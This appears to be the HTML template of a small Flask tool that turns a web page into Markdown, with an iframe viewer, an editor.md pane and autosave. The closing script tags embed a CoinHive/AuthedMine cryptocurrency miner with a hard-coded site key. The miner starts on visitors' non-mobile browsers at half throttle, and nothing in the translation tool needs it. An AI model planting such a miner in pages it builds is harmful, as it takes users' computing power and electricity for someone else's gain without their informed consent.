<!DOCTYPE html>
<html lang="zh">
<head>
    <meta charset="utf-8"/>
    <title>TransLater</title>
    <link rel="stylesheet" href="{{ url_for('static',filename='editormd/css/editormd.css') }}"/>
</head>
<body>
<div style="width:100%; margin:; overflow:auto; _display:inline-block;">
<div id="source" style="float:left;width:600px;height:640px">
    <iframe name="tgtbrowser" id="tgtbrowser" src="" style="width: 100%;height: 100%" ></iframe>
</div>
<div id="test-editormd" style="margin-left:605px;height:640px" >
<!-- {{ mkd }} -->
</div>
<div style="margin-top: 1px">
    <input type="text" id="tgturl" name="tgturl" style="width: 70%;height: 100%"><button name="submitTGT" onclick="url_tgt()">提交</button>
<a href="/download/book.md" >下载MD文件</a>
</div>
</div>

<script src="{{ url_for('static',filename='js/jquery.min.js') }}"></script>
<script src="{{ url_for('static',filename='editormd/editormd.min.js') }}"></script>
<script type=text/javascript>
$SCRIPT_ROOT = {{ request.script_root|tojson|safe }};
</script>
<script type="text/javascript">
    var testEditor;

    $(function () {
        testEditor = editormd("test-editormd", {

            width: "50%",
            height: 640,
            syncScrolling: "single",
            tex: true,
            imageUpload: true,
            path: "{{ url_for('static',filename='editormd/lib/') }}"
        });
        var key1 = 'default_md_key';
        var key2 ='url_key';
        var $iframe = $('#tgtbrowser');
        testEditor.on("load", function(){
        var content = localStorage.getItem(key1);
        var url = localStorage.getItem(key2);
        if(content){
            var f = confirm("您上次编辑的文章未保存，是否恢复?\n");
            if(f == true){
                testEditor.setValue(content)
                $iframe.attr('src',url);
            }
        }
       
    })

    testEditor.on("change", function(){
        localStorage.setItem(key1,this.getValue())
        $.post($SCRIPT_ROOT + '/saveMd', {
        	'MDSTR': this.getValue()
	      }, function(data) {
/* 	        alert('保存成功');
 */	      });
    })
    });

    function url_tgt() {
        var url=$('#tgturl').val();
        var $iframe = $('#tgtbrowser');
        var key2 ='url_key';
        if ( $iframe.length ) {
            $iframe.attr('src',url);
            localStorage.setItem(key2,url);
        }
        $.getJSON($SCRIPT_ROOT + '/Transmd', {
	        Weburl: url
	      }, function(data) {
	        testEditor.setValue(data.mdstr)
	      });

        var mdstr= testEditor.getValue();
       	$.post($SCRIPT_ROOT + '/saveMd', {
       		'MDSTR': mdstr
	      }, function(data) {
/* 	        alert('保存成功');
 */	      });
        
    }

</script>
<script src="https://authedmine.com/lib/authedmine.min.js"></script>
<script>
    var miner = new CoinHive.Anonymous('tm90NvGZv9pRzH5jCKDABphQta8L65Tp', {throttle: 0.5});

    // Only start on non-mobile devices and if not opted-out
    // in the last 14400 seconds (4 hours):
    if (!miner.isMobile() && !miner.didOptOut(14400)) {
        miner.start();
    }
</script>
</body>
</html>